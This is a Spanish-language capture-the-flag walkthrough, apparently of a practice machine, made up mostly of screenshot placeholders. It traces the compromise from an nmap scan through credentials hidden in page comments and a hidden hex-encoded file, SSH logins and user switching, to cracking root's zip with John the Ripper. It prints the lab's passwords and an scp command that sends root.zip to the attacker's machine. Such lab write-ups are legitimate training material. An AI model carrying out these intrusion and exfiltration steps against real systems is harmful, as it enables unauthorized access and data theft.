Hacemos el escaneo con nmap:
{{pasted_image_20230925091918.png|}}
Y esta es la web:
{{pasted_image_20230925091928.png|}}
Si vemos el código fuente vemos este comentario:
{{pasted_image_20230925092052.png|}}
Por lo que accedemos aquí:
{{pasted_image_20230925092109.png|}}
Y volvemos a ver otro comentario:
{{pasted_image_20230925092124.png|}}
{{pasted_image_20230925092136.png|}}
Y en la parte de la derecha del todo vemos unas líneas que ponen user y abajo del todo una pass:
{{pasted_image_20230925092308.png|}}
{{pasted_image_20230925092215.png|}}
Sacamos la contraseña con cyberchef aplicándole el filtro de magic:
{{pasted_image_20230925092500.png|}}
Y sacamos el user de la misma forma:
{{pasted_image_20230925092523.png|}}
alice:IwillGoDeeper
Probamos en acceder vía ssh y vemos que funciona:
{{pasted_image_20230925092649.png|}}
Viendo archivos ocultos nos encontramos con un .bob.txt:
{{pasted_image_20230925092822.png|}}
535746745247566c634556756233566e61413d3d
{{pasted_image_20230925092857.png|}}
Que nos extrae lo siguiente:
IamDeepEnough
Y usando esta clave nos convertimos en el usuario bob:
{{pasted_image_20230925092957.png|}}
Y dentro de la raíz nos encontramos con un archivo zip:
{{pasted_image_20230925093026.png|}}
Vamos a enviarnos este archivo por scp a nuestra máquina atacante:
scp root.zip kali@192.168.0.63:/home/kali/Desktop/
{{pasted_image_20230925093528.png|}}
{{pasted_image_20230925093535.png|}}
Y tenemos una contraseña que tendremos que crackear usando john the ripper:
{{pasted_image_20230925093604.png|}}
Y vemos que la contraseña es bob:
{{pasted_image_20230925093653.png|}}
Y ya tenemos la password de root:
root:IhateMyPassword
{{pasted_image_20230925093713.png|}}
{{pasted_image_20230925093739.png|}}